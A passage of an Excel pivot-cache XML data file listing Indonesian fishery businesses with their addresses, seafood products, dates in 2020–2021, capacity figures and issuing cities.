    <s v="Jl. Yos Sudarso No.8, Kel. Tenda, Kec. Hulonthalangi, Kota Gorontalo&lt;br&gt;Gorontalo"/>
    <n v="25"/>
    <s v="Ikan Demersal Beku (Kerapu, Kakap)"/>
    <d v="2020-06-19T00:00:00"/>
    <n v="10000"/>
    <s v="Kota Jakarta Utara"/>
    <m/>
  </r>
  <r>
    <n v="20755"/>
    <x v="439"/>
    <s v="CV. INDOMINA CIPTA SEJAHTERA"/>
    <s v="Jl. Yos Sudarso No.8, Kel. Tenda, Kec. Hulonthalangi, Kota Gorontalo&lt;br&gt;Gorontalo"/>
    <n v="25"/>
    <s v="Udang Beku"/>
    <d v="2020-06-19T00:00:00"/>
    <n v="10000"/>
    <s v="Kota Jakarta Utara"/>
    <m/>
  </r>
  <r>
    <n v="20756"/>
    <x v="439"/>
    <s v="CV. INDOMINA CIPTA SEJAHTERA"/>
    <s v="Jl. Yos Sudarso No.8, Kel. Tenda, Kec. Hulonthalangi, Kota Gorontalo&lt;br&gt;Gorontalo"/>
    <n v="25"/>
    <s v="Kerang Beku"/>
    <d v="2020-06-19T00:00:00"/>
    <n v="10000"/>
    <s v="Kota Jakarta Utara"/>
    <m/>
  </r>
  <r>
    <n v="20830"/>
    <x v="440"/>
    <s v="UD. GARUDA"/>
    <s v="Jl. Garuda Lk IV Pulau Buaya, Kel. Beting Kuala Kapias, Kec. Teluk Nibung, Kota Tanjung Balai&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Ikan Pelagis Beku (Layang)"/>
    <d v="2020-06-18T00:00:00"/>
    <n v="0"/>
    <s v="Kota Tanjung Balai"/>
    <m/>
  </r>
  <r>
    <n v="20831"/>
    <x v="440"/>
    <s v="UD. GARUDA"/>
    <s v="Jl. Garuda Lk IV Pulau Buaya, Kel. Beting Kuala Kapias, Kec. Teluk Nibung, Kota Tanjung Balai&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Ikan Asin Kering"/>
    <d v="2020-06-18T00:00:00"/>
    <n v="0"/>
    <s v="Kota Tanjung Balai"/>
    <m/>
  </r>
  <r>
    <n v="20832"/>
    <x v="440"/>
    <s v="UD. GARUDA"/>
    <s v="Jl. Garuda Lk IV Pulau Buaya, Kel. Beting Kuala Kapias, Kec. Teluk Nibung, Kota Tanjung Balai&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Ikan Pindang Kering"/>
    <d v="2020-06-18T00:00:00"/>
    <n v="41751"/>
    <s v="Kota Tanjung Balai"/>
    <m/>
  </r>
  <r>
    <n v="20898"/>
    <x v="441"/>
    <s v="PT. SARI USAHA MANDIRI"/>
    <s v="Kel. Manembo-nembo, Kec. Matuari, Kota Bitung&lt;br&gt;Sulawesi Utara"/>
    <n v="29"/>
    <s v="Ikan Pelagis Beku (Baby Tuna, Tongkol, Layang, Cakalang)"/>
    <d v="2020-06-03T00:00:00"/>
    <n v="1200000"/>
    <s v="Kota Jakarta Utara"/>
    <m/>
  </r>
  <r>
    <n v="21049"/>
    <x v="442"/>
    <s v="UD. UTAMA SENTOSA TIMIKA"/>
    <s v="Jl. Yos Sudarso KM 7, Kel. Kamoro Jaya, Kec. Timika Timur, Kabupaten Mimika&lt;br&gt;Papua"/>
    <n v="34"/>
    <s v="Udang Beku"/>
    <d v="2021-06-04T00:00:00"/>
    <n v="180000"/>
    <s v="Kota Jakarta Utara"/>
    <m/>
  </r>
  <r>
    <n v="21050"/>
    <x v="442"/>
    <s v="UD. UTAMA SENTOSA TIMIKA"/>
    <s v="Jl. Yos Sudarso KM 7, Kel. Kamoro Jaya, Kec. Timika Timur, Kabupaten Mimika&lt;br&gt;Papua"/>
    <n v="34"/>
    <s v="Ikan Pelagis Beku (Banjar, Tenggiri, Lasi, Kembung)"/>
    <d v="2021-06-04T00:00:00"/>
    <n v="120000"/>
    <s v="Kota Jakarta Utara"/>
    <m/>
  </r>
  <r>
    <n v="21055"/>
    <x v="442"/>
    <s v="UD, UTAMA SENTOSA TIMIKA"/>
    <s v="Jl, Yos Sudarso KM 7, Kel, Kamoro Jaya, Kec, Timika Timur, Kabupaten Mimika&lt;br&gt;Papua"/>
    <n v="34"/>
    <s v="Ikan Demersal Beku (Manyung, Anggoli, Bawal, Kakap)"/>
    <d v="2021-06-04T00:00:00"/>
    <n v="12000"/>
    <s v="Kota Jakarta Utara"/>
    <m/>
  </r>
  <r>
    <n v="21093"/>
    <x v="259"/>
    <s v="PT. SULTRATUNA SAMUDRA"/>
    <s v="Kompleks Pelabuhan Perikanan Samudera Kendari, Jl. Samudera No.1, Kel. Puday, Kec. Abeli, Kota Kendari&lt;br&gt;Sulawesi Tenggara"/>
    <n v="27"/>
    <s v="Udang Beku"/>
    <d v="2020-06-23T00:00:00"/>
    <n v="16546"/>
    <s v="Kota Jakarta Barat"/>
    <m/>
  </r>
  <r>
    <n v="21328"/>
    <x v="59"/>
    <s v="PT. SATYA TRINADI KOMIRA PERKASA"/>
    <s v="Komplek Pergudangan Kosambi Permai Blok. KK19 Desa Jatimulya Kab. Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Cephalopoda Segar (Cumi-cumi)"/>
    <d v="2020-07-22T00:00:00"/>
    <n v="1000"/>
    <s v="Kota Jakarta Utara"/>
    <m/>
  </r>
  <r>
    <n v="21330"/>
    <x v="59"/>
    <s v="PT. SATYA TRINADI KOMIRA PERKASA"/>
    <s v="Komplek Pergudangan Kosambi Permai Blok. KK19 Desa Jatimulya Kab. Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Ikan Demersal Segar (Layur, Kakap Merah, Baronang)"/>
    <d v="2020-07-22T00:00:00"/>
    <n v="1000"/>
    <s v="Kota Jakarta Utara"/>
    <m/>
  </r>
  <r>
    <n v="21334"/>
    <x v="59"/>
    <s v="PT. SATYA TRINADI KOMIRA PERKASA"/>
    <s v="Komplek Pergudangan Kosambi Permai Blok. KK19 Desa Jatimulya Kab. Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Telur Ikan Segar"/>
    <d v="2020-07-22T00:00:00"/>
    <n v="1000"/>
    <s v="Kota Jakarta Utara"/>
    <m/>
  </r>
  <r>
    <n v="21371"/>
    <x v="201"/>
    <s v="PT. LUCKY SAMUDRA PRATAMA"/>
    <s v="Jl. Muara Baru Ujung Blok F No.1, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Pelagis Segar (Teri, Lemuru, Terbang, Kembung, Japuh, Selar, Layang, Sunglir, Selangat)"/>
    <d v="2020-09-01T00:00:00"/>
    <n v="50000"/>
    <s v="Kota Jakarta Utara"/>
    <m/>
  </r>
  <r>
    <n v="19772"/>
    <x v="290"/>
    <s v="PT. SURYA FRESHINDO INTIMAS"/>
    <s v="Jl. Nusantara RT 002 RW 004, Kel. Tanjung Balai Kota, Kec. Karimun, Kabupaten Karimun&lt;br&gt;Kepulauan Riau"/>
    <n v="5"/>
    <s v="Ikan Demesal Beku (Manyung, Kerapu, Bawal, Kakap)"/>
    <d v="2020-03-06T00:00:00"/>
    <n v="100000"/>
    <s v="Kabupaten Karimun"/>
    <m/>
  </r>
  <r>
    <n v="19774"/>
    <x v="290"/>
    <s v="PT. SURYA FRESHINDO INTIMAS"/>
    <s v="Jl. Nusantara RT 002 RW 004, Kel. Tanjung Balai Kota, Kec. Karimun, Kabupaten Karimun&lt;br&gt;Kepulauan Riau"/>
    <n v="5"/>
    <s v="Ikan Demersal Segar (Manyung, Kerapu, Bawal, Kakap)"/>
    <d v="2020-03-06T00:00:00"/>
    <n v="15000"/>
    <s v="Kabupaten Karimun"/>
    <m/>
  </r>
  <r>
    <n v="19422"/>
    <x v="443"/>
    <s v="PT. KELOLA MINA LAUT - MINI PLANT KALIMAYA"/>
    <s v="Desa Sukawali RT 01 RW 04, Kec. Pakuhaji, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Daging Rajungan Rebus Dingin"/>
    <d v="2020-02-12T00:00:00"/>
    <n v="3500"/>
    <s v="Kabupaten Serang"/>
    <m/>
  </r>
  <r>
    <n v="16696"/>
    <x v="444"/>
    <s v="CV. SINAR LAUT ABADI TUBAN"/>
    <s v="Jl. Raya Sugih Waras, Dusun Jabung, Kel. Sugihwaras, Kec. Jenu, Kabupaten Tuban&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Demersal Beku (Mata Besar, Gulama, Kuniran, Layur, Beloso, Bawal, Rejung, Jaket)"/>
    <d v="2020-01-17T00:00:00"/>
    <n v="2000"/>
    <s v="Kabupaten Tuban"/>
    <m/>
  </r>
  <r>
    <n v="16634"/>
    <x v="370"/>
    <s v="PT. MAJU MINA LAUT INDONESIA"/>
    <s v="Jl. Husein Sastranegara No.109 RT 003 RW 010 Room 09, Kel. Benda, Kec. Benda, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Kerang Beku"/>
    <d v="2020-04-02T00:00:00"/>
    <n v="0"/>
    <s v="Kota Tangerang"/>
    <m/>
  </r>
  <r>
    <n v="16635"/>
    <x v="370"/>
    <s v="PT. MAJU MINA LAUT INDONESIA"/>
    <s v="Jl. Husein Sastranegara No.109 RT 003 RW 010 Room 09, Kel. Benda, Kec. Benda, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2020-04-02T00:00:00"/>
    <n v="0"/>
    <s v="Kota Tangerang"/>
    <m/>
  </r>
  <r>
    <n v="16638"/>
    <x v="379"/>
    <s v="CV. FIRDALI SEJAHTERA"/>
    <s v="Jl. Husein Sastranegara No.109 RT 003 RW 010 Room 07, Kel. Benda, Kec. Benda, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Kerang Beku"/>
    <d v="2020-04-02T00:00:00"/>
    <n v="0"/>
    <s v="Kota Tangerang"/>
    <m/>
  </r>
  <r>
    <n v="17373"/>
    <x v="445"/>
    <s v="PT. ASSA JAKARTA"/>
    <s v="Komplek Pergudangan Kosambi Permai Blok G No.15, Jl. Raya Perancis Dadap, Kel. Jatimulya, Kec. Kosambi, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Ikan Pelagis Beku (Tongkol, Layang, Cakalang, Salem)"/>
    <d v="2020-01-29T00:00:00"/>
    <n v="0"/>
    <s v="Kota Tangerang"/>
    <m/>
  </r>
  <r>
    <n v="17475"/>
    <x v="331"/>
    <s v="PT. OCEAN MEGA PERSADA"/>
    <s v="Ruko Klampis Square C-28, Kel. Klampis Ngasem, Kec. Sukolilo, Kota Surabaya&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Demersal Beku (Manyung, Kerapu, Bawal, Kakap)"/>
    <d v="2020-02-10T00:00:00"/>
    <n v="60000"/>
    <s v="Kota Surakarta"/>
    <m/>
  </r>
  <r>
    <n v="19384"/>
    <x v="446"/>
    <s v="PT. FKS MULTI AGRO TBK"/>
    <s v="Jl. Kalimati No.36, Dusun Stoplas, Desa Kedungrejo, Kec. Muncar, Kabupaten Banyuwangi&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Pelagis Beku (Lemuru, Tongkol, Layang)"/>
    <d v="2020-04-16T00:00:00"/>
    <n v="1000000"/>
    <s v="Kabupaten Pati"/>
    <m/>
  </r>
  <r>
    <n v="19794"/>
    <x v="447"/>
    <s v="UD. KAYA RASA"/>
    <s v="Perum Keledang Mas Baru Blok BR/18, Kel. Sungai Keledang, Kec. Samarinda Seberang, Kota Samarinda&lt;br&gt;Kalimantan Timur"/>
    <n v="23"/>
    <s v="Nugget Udang"/>
    <d v="2020-02-27T00:00:00"/>
    <n v="384"/>
    <s v="Kota Samarinda"/>
    <m/>
  </r>
  <r>
    <n v="19795"/>
    <x v="447"/>
    <s v="UD. KAYA RASA"/>
    <s v="Perum Keledang Mas Baru Blok BR/18, Kel. Sungai Keledang, Kec. Samarinda Seberang, Kota Samarinda&lt;br&gt;Kalimantan Timur"/>
    <n v="23"/>
    <s v="Pempek Ikan"/>
    <d v="2020-02-27T00:00:00"/>
    <n v="1296"/>
    <s v="Kota Samarinda"/>
    <m/>
  </r>
  <r>
    <n v="19989"/>
    <x v="448"/>
    <s v="QAN"/>
    <s v="Jl. Anggrek Bukit RT 22 No.07, Kel. Air Putih, Kec. Samarinda Ulu, Kota Samarinda&lt;br&gt;Kalimantan Timur"/>
    <n v="23"/>
    <s v="Pempek Ikan"/>
    <d v="2020-09-14T00:00:00"/>
    <n v="500"/>
    <s v="Kota Samarinda"/>
    <m/>
  </r>
  <r>
    <n v="19990"/>
    <x v="448"/>
    <s v="QAN"/>
    <s v="Jl. Anggrek Bukit RT 22 No.07, Kel. Air Putih, Kec. Samarinda Ulu, Kota Samarinda&lt;br&gt;Kalimantan Timur"/>
    <n v="23"/>
    <s v="Otak-Otak Ikan"/>
    <d v="2020-09-14T00:00:00"/>
    <n v="100"/>
    <s v="Kota Samarinda"/>
    <m/>
  </r>
  <r>
    <n v="19991"/>
    <x v="448"/>
    <s v="QAN"/>
    <s v="Jl. Anggrek Bukit RT 22 No.07, Kel. Air Putih, Kec. Samarinda Ulu, Kota Samarinda&lt;br&gt;Kalimantan Timur"/>
    <n v="23"/>
    <s v="Tekwan Ikan"/>
    <d v="2020-09-14T00:00:00"/>
    <n v="100"/>
    <s v="Kota Samarinda"/>
    <m/>
  </r>
  <r>
    <n v="20063"/>
    <x v="449"/>
    <s v="CV. YUDA YUDI GRUP"/>
    <s v="Jl. Fakih Usman Lorong Sungai Goren Satu No.12 RT 023 RW 004, Kel. 1 Ulu, Kec. Seberang Ulu I, Kota Palembang&lt;br&gt;Sumatera Selatan"/>
    <n v="9"/>
    <s v="Lumatan Daging Gabus Beku"/>
    <d v="2020-02-21T00:00:00"/>
    <n v="3600"/>
    <s v="Kota Palembang"/>
    <m/>
  </r>
  <r>
    <n v="20829"/>
    <x v="450"/>
    <s v="CV. NASYA NOOR SEJAHTERA"/>
    <s v="Jl. Suwandi Blok C No.52 RT 23, Kel. Gunung Kelua, Kec. Samarinda Ulu, Kota Samarinda&lt;br&gt;Kalimantan Timur"/>
    <n v="23"/>
    <s v="Pempek Ikan"/>
    <d v="2020-05-19T00:00:00"/>
    <n v="6000"/>
    <s v="Kota Samarinda"/>
    <m/>
  </r>
  <r>
    <n v="20901"/>
    <x v="451"/>
    <s v="SUMBER REJEKI"/>
    <s v="Perum Bukit Pinang Bahari Blok AA5 No.1, Kel. Sungai Keledang, Kec. Samarinda Seberang, Kota Samarinda&lt;br&gt;Kalimantan Timur"/>
    <n v="23"/>
    <s v="Otak-Otak Bandeng"/>
    <d v="2020-06-12T00:00:00"/>
    <n v="600"/>
    <s v="Kota Samarinda"/>
    <m/>
  </r>
  <r>
    <n v="20902"/>
    <x v="451"/>
    <s v="SUMBER REJEKI"/>
    <s v="Perum Bukit Pinang Bahari Blok AA5 No.1, Kel. Sungai Keledang, Kec. Samarinda Seberang, Kota Samarinda&lt;br&gt;Kalimantan Timur"/>
    <n v="23"/>
    <s v="Bandeng Tanpa Duri"/>
    <d v="2020-06-12T00:00:00"/>
    <n v="1200"/>
    <s v="Kota Samarinda"/>
    <m/>
  </r>
  <r>
    <n v="20903"/>
    <x v="451"/>
    <s v="SUMBER REJEKI"/>
    <s v="Perum Bukit Pinang Bahari Blok AA5 No.1, Kel. Sungai Keledang, Kec. Samarinda Seberang, Kota Samarinda&lt;br&gt;Kalimantan Timur"/>
    <n v="23"/>
    <s v="Bandeng Presto"/>
    <d v="2020-06-12T00:00:00"/>
    <n v="600"/>
    <s v="Kota Samarinda"/>
    <m/>
  </r>
  <r>
    <n v="16852"/>
    <x v="452"/>
    <s v="PT. BIRU SAMUDERA PERKASA"/>
    <s v="Jl. PPD Blok C-2 No.2 RT 004 RW 004, Kel. Kedaung Kali Angke, Kec. Cengkareng, Kota Jakarta Barat&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Demersal Beku (Barramundi, Kakap)"/>
    <d v="2020-01-31T00:00:00"/>
    <n v="24000"/>
    <s v="Kota Makassar"/>
    <m/>
  </r>
  <r>
    <n v="16853"/>
    <x v="452"/>
    <s v="PT. BIRU SAMUDERA PERKASA"/>
    <s v="Jl. PPD Blok C-2 No.2 RT 004 RW 004, Kel. Kedaung Kali Angke, Kec. Cengkareng, Kota Jakarta Barat&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Udang Beku"/>
    <d v="2020-01-31T00:00:00"/>
    <n v="2400"/>
    <s v="Kota Makassar"/>
    <m/>
  </r>
  <r>
    <n v="16854"/>
    <x v="452"/>
    <s v="PT. BIRU SAMUDERA PERKASA"/>
    <s v="Jl. PPD Blok C-2 No.2 RT 004 RW 004, Kel. Kedaung Kali Angke, Kec. Cengkareng, Kota Jakarta Barat&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Lobster Beku"/>
    <d v="2020-01-31T00:00:00"/>
    <n v="2400"/>
    <s v="Kota Makassar"/>
    <m/>
  </r>
  <r>
    <n v="17258"/>
    <x v="420"/>
    <s v="UD. EKA TIRTA"/>
    <s v="Kampung Jati, Kel. Labuhan Lombok, Kec. Pringgabaya, Kabupaten Lombok Timur&lt;br&gt;Nusa Tenggara Barat"/>
    <n v="18"/>
    <s v="Tuna Loin Beku"/>
    <d v="2020-01-23T00:00:00"/>
    <n v="1000"/>
    <s v="Kota Denpasar"/>
    <m/>
  </r>
  <r>
    <n v="17259"/>
    <x v="420"/>
    <s v="UD. EKA TIRTA"/>
    <s v="Kampung Jati, Kel. Labuhan Lombok, Kec. Pringgabaya, Kabupaten Lombok Timur&lt;br&gt;Nusa Tenggara Barat"/>
    <n v="18"/>
    <s v="Tuna Loin Segar"/>
    <d v="2020-01-23T00:00:00"/>
    <n v="1000"/>
    <s v="Kota Denpasar"/>
    <m/>
  </r>
  <r>
    <n v="17260"/>
    <x v="420"/>
    <s v="UD. EKA TIRTA"/>
    <s v="Kampung Jati, Kel. Labuhan Lombok, Kec. Pringgabaya, Kabupaten Lombok Timur&lt;br&gt;Nusa Tenggara Barat"/>
    <n v="18"/>
    <s v="Tuna Beku"/>
    <d v="2020-01-23T00:00:00"/>
    <n v="10000"/>
    <s v="Kota Denpasar"/>
    <m/>
  </r>
  <r>
    <n v="17261"/>
    <x v="420"/>
    <s v="UD. EKA TIRTA"/>
    <s v="Kampung Jati, Kel. Labuhan Lombok, Kec. Pringgabaya, Kabupaten Lombok Timur&lt;br&gt;Nusa Tenggara Barat"/>
    <n v="18"/>
    <s v="Tuna Segar"/>
    <d v="2020-01-23T00:00:00"/>
    <n v="30000"/>
    <s v="Kota Denpasar"/>
    <m/>
  </r>
  <r>
    <n v="17262"/>
    <x v="420"/>
    <s v="UD. EKA TIRTA"/>
    <s v="Kampung Jati, Kel. Labuhan Lombok, Kec. Pringgabaya, Kabupaten Lombok Timur&lt;br&gt;Nusa Tenggara Barat"/>
    <n v="18"/>
    <s v="Ikan Demersal Beku (Kerapu, Kakap)"/>
    <d v="2020-01-23T00:00:00"/>
    <n v="2000"/>
    <s v="Kota Denpasar"/>
    <m/>
  </r>
  <r>
    <n v="17263"/>
    <x v="420"/>
    <s v="UD. EKA TIRTA"/>
    <s v="Kampung Jati, Kel. Labuhan Lombok, Kec. Pringgabaya, Kabupaten Lombok Timur&lt;br&gt;Nusa Tenggara Barat"/>
    <n v="18"/>
    <s v="Ikan Demersal Segar (Kerapu, Kakap)"/>
    <d v="2020-01-23T00:00:00"/>
    <n v="2000"/>
    <s v="Kota Denpasar"/>
    <m/>
  </r>
  <r>
    <n v="17278"/>
    <x v="420"/>
    <s v="UD. EKA TIRTA"/>
    <s v="Kampung Jati, Kel. Labuhan Lombok, Kec. Pringgabaya, Kabupaten Lombok Timur&lt;br&gt;Nusa Tenggara Barat"/>
    <n v="18"/>
    <s v="Fillet Ikan Beku "/>
    <d v="2020-01-23T00:00:00"/>
    <n v="2000"/>
    <s v="Kota Denpasar"/>
    <m/>
  </r>
  <r>
    <n v="17452"/>
    <x v="331"/>
    <s v="PT. OCEAN MEGA PERSADA"/>
    <s v="Ruko Klampis Square C-28, Kel. Klampis Ngasem, Kec. Sukolilo, Kota Surabaya&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Pelagis Beku (Kembung, Salem, Layang, Tenggiri)"/>
    <d v="2020-02-10T00:00:00"/>
    <n v="600000"/>
    <s v="Kota Surabaya"/>
    <m/>
  </r>
  <r>
    <n v="17453"/>
    <x v="331"/>
    <s v="PT. OCEAN MEGA PERSADA"/>
    <s v="Ruko Klampis Square C-28, Kel. Klampis Ngasem, Kec. Sukolilo, Kota Surabaya&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Hasil Budidaya Beku (Lele, Bandeng, Patin, Nila, Gurame)"/>
    <d v="2020-02-10T00:00:00"/>
    <n v="60000"/>
    <s v="Kota Surabaya"/>
    <m/>
  </r>
  <r>
    <n v="19388"/>
    <x v="23"/>
    <s v="PT. INTIMAS SURYA"/>
    <s v="Jl. Ikan Tuna Raya, Pelabuhan Benoa, Kel. Pedungan, Kec. Denpasar Selatan, Kota Denpasar&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Salmon Beku"/>
    <d v="2020-03-19T00:00:00"/>
    <n v="100000"/>
    <s v="Kota Denpasar"/>
    <m/>
  </r>
  <r>
    <n v="19392"/>
    <x v="192"/>
    <s v="PT. MINA JAYA LESTARI PLANT 2"/>
    <s v="Pergudangan Margomulyo Permai Blok K-14, K-15, K-16, Kel. Tambak Sarioso, Kec. Asemrowo, Kota Surabaya&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Tuna Beku"/>
    <d v="2020-03-23T00:00:00"/>
    <n v="3000000"/>
    <s v="Kota Surabaya"/>
    <m/>
  </r>
  <r>
    <n v="19409"/>
    <x v="32"/>
    <s v="CV. INDOTROPIC FISHERY"/>
    <s v="Jl. Raya Km 9, Kel. Biak, Kec. Luwuk Utara, Kabupaten Banggai&lt;br&gt;Sulawesi Tengah"/>
    <n v="28"/>
    <s v="Tuna Beku"/>
    <d v="2020-02-27T00:00:00"/>
    <n v="10000"/>
    <s v="Kota Surabaya"/>
    <m/>
  </r>
  <r>
    <n v="19715"/>
    <x v="453"/>
    <s v="CV, ANGIN TIMUR SEAFOODS"/>
    <s v="Pergudangan Sinar Gedangan Blok E-15, Kel, Gemurung, Kec, Gedangan, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Fillet Hiu Beku"/>
    <d v="2020-02-04T00:00:00"/>
    <n v="120000"/>
    <s v="Kota Surabaya"/>
    <m/>
  </r>
  <r>
    <n v="19755"/>
    <x v="452"/>
    <s v="PT. BIRU SAMUDERA PERKASA"/>
    <s v="Jl. PPD Blok C-2 No.2 RT 004 RW 004, Kel. Kedaung Kali Angke, Kec. Cengkareng, Kota Jakarta Barat&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Pelagis Beku (Gindara)"/>
    <d v="2020-01-31T00:00:00"/>
    <n v="2000"/>
    <s v="Kota Makassar"/>
    <m/>
  </r>
  <r>
    <n v="20121"/>
    <x v="454"/>
    <s v="PT. SURYA ALAM TUNGGAL"/>
    <s v="Jl. Kusuma Bangsa No.60 RT 15 RW 01, Kel. Gunung Lingkas, Kec. Tarakan Timur, Kota Tarakan&lt;br&gt;Kalimantan Utara"/>
    <n v="24"/>
    <s v="Udang Mentah Beku"/>
    <d v="2020-04-28T00:00:00"/>
    <n v="120000"/>
    <s v="Kota Surabaya"/>
    <m/>
  </r>
  <r>
    <n v="20693"/>
    <x v="283"/>
    <s v="PT. ARAFURA MARINE CULTURE"/>
    <s v="Desa Ujir, Kec. Pulau-Pulau Aru, Kabupaten Kepulauan Aru&lt;br&gt;Maluku"/>
    <n v="31"/>
    <s v="Ikan Demersal Segar (Lencam, Kerapu, Kakap)"/>
    <d v="2020-05-20T00:00:00"/>
    <n v="12000"/>
    <s v="Kota Surabaya"/>
    <m/>
  </r>
  <r>
    <n v="20129"/>
    <x v="455"/>
    <s v="CV. DELAPAN DELAPAN"/>
    <s v="Jl. TGH Faesal No.88X Lingkungan Gerung Sayo Indah, Kel. Mandalika, Kec. Sandubaya, Kota Mataram&lt;br&gt;Nusa Tenggara Barat"/>
    <n v="18"/>
    <s v="Fillet Patin Beku"/>
    <d v="2020-03-30T00:00:00"/>
    <n v="1000"/>
    <s v="Kota Mataram"/>
    <m/>
  </r>
  <r>
    <n v="20442"/>
    <x v="456"/>
    <s v="PT. BANDUNG KULINA UTAMA"/>
    <s v="Kawasan Industri Millenium Jl. Millenium 11 Blok F4 No. 3 (Room 3), Kel. Peusar, Kec. Panongan, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Salmon Segar, Trout Segar"/>
    <d v="2020-05-15T00:00:00"/>
    <n v="450000"/>
    <s v="Kota Bandung"/>
    <m/>
  </r>
  <r>
    <n v="20443"/>
    <x v="456"/>
    <s v="PT. BANDUNG KULINA UTAMA"/>
    <s v="Kawasan Industri Millenium Jl. Millenium 11 Blok F4 No. 3 (Room 3), Kel. Peusar, Kec. Panongan, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Salmon Beku, Trout Beku"/>
    <d v="2020-05-15T00:00:00"/>
    <n v="350000"/>
    <s v="Kota Bandung"/>
    <m/>
  </r>
  <r>
    <n v="20444"/>
    <x v="456"/>
    <s v="PT. BANDUNG KULINA UTAMA"/>
    <s v="Kawasan Industri Millenium Jl. Millenium 11 Blok F4 No. 3 (Room 3), Kel. Peusar, Kec. Panongan, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Mussel Segar, Scallop Segar, Tiram Segar, Clams Segar"/>
    <d v="2020-05-15T00:00:00"/>
    <n v="50000"/>
    <s v="Kota Bandung"/>
    <m/>
  </r>
  <r>
    <n v="20445"/>
    <x v="456"/>
    <s v="PT. BANDUNG KULINA UTAMA"/>
    <s v="Kawasan Industri Millenium Jl. Millenium 11 Blok F4 No. 3 (Room 3), Kel. Peusar, Kec. Panongan, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Kepiting Beku"/>
    <d v="2020-05-15T00:00:00"/>
    <n v="100000"/>
    <s v="Kota Bandung"/>
    <m/>
  </r>
  <r>
    <n v="20446"/>
    <x v="456"/>
    <s v="PT. BANDUNG KULINA UTAMA"/>
    <s v="Kawasan Industri Millenium Jl. Millenium 11 Blok F4 No. 3 (Room 3), Kel. Peusar, Kec. Panongan, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Mussel Beku, Scallop Beku, Tiram Beku, Clams Beku"/>
    <d v="2020-05-15T00:00:00"/>
    <n v="100000"/>
    <s v="Kota Bandung"/>
    <m/>
  </r>
  <r>
    <n v="20447"/>
    <x v="456"/>
    <s v="PT. BANDUNG KULINA UTAMA"/>
    <s v="Kawasan Industri Millenium Jl. Millenium 11 Blok F4 No. 3 (Room 3), Kel. Peusar, Kec. Panongan, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Cephalopoda Segar (Cumi-cumi)"/>
    <d v="2020-05-15T00:00:00"/>
    <n v="150000"/>
    <s v="Kota Bandung"/>
    <m/>
  </r>
  <r>
    <n v="20448"/>
    <x v="456"/>
    <s v="PT. BANDUNG KULINA UTAMA"/>
    <s v="Kawasan Industri Millenium Jl. Millenium 11 Blok F4 No. 3 (Room 3), Kel. Peusar, Kec. Panongan, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Cephalopoda Beku (Cumi-cumi)"/>
    <d v="2020-05-15T00:00:00"/>
    <n v="200000"/>
    <s v="Kota Bandung"/>
    <m/>
  </r>
  <r>
    <n v="20449"/>
    <x v="457"/>
    <s v="RUMAH IKAN"/>
    <s v="Kampus UMMU Ternate, Jl. KH. A. Dahlan No.100, Kel. Sasa, Kec. Ternate Selatan, Kota Ternate&lt;br&gt;Maluku Utara"/>
    <n v="32"/>
    <s v="Tuna Rica-Rica Kaleng, Tuna Kering Kayu Kaleng"/>
    <d v="2020-04-02T00:00:00"/>
    <n v="240000"/>
    <s v="Kota Ternate"/>
    <m/>
  </r>
  <r>
    <n v="20205"/>
    <x v="458"/>
    <s v="CV. SAMARA FOOD"/>
    <s v="Jl. M. Syafei No.12 RT 02 RW 02, Kel. Talang, Kec. Payakumbuh Barat, Kota Payakumbuh&lt;br&gt;Sumatera Barat"/>
    <n v="3"/>
    <s v="Produk Perikanan Bernilai Tambah Beku (Bakso Tuna, Naget Tuna, Tahu Tuna, Siomay Tuna)"/>
    <d v="2020-11-20T00:00:00"/>
    <n v="150"/>
    <s v="Kota Padang"/>
    <m/>
  </r>
  <r>
    <n v="16988"/>
    <x v="407"/>
    <s v="CV. LAUTAN MAS"/>
    <s v="Jl. Pulau Nias Selatan No.1 KIM 3, Kel. Mabar, Kec. Medan Deli , Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2020-03-06T00:00:00"/>
    <n v="50000"/>
    <s v="Kota Medan"/>
    <m/>
  </r>
  <r>
    <n v="17355"/>
    <x v="459"/>
    <s v="PT. AGRO WESTINDO ABADI"/>
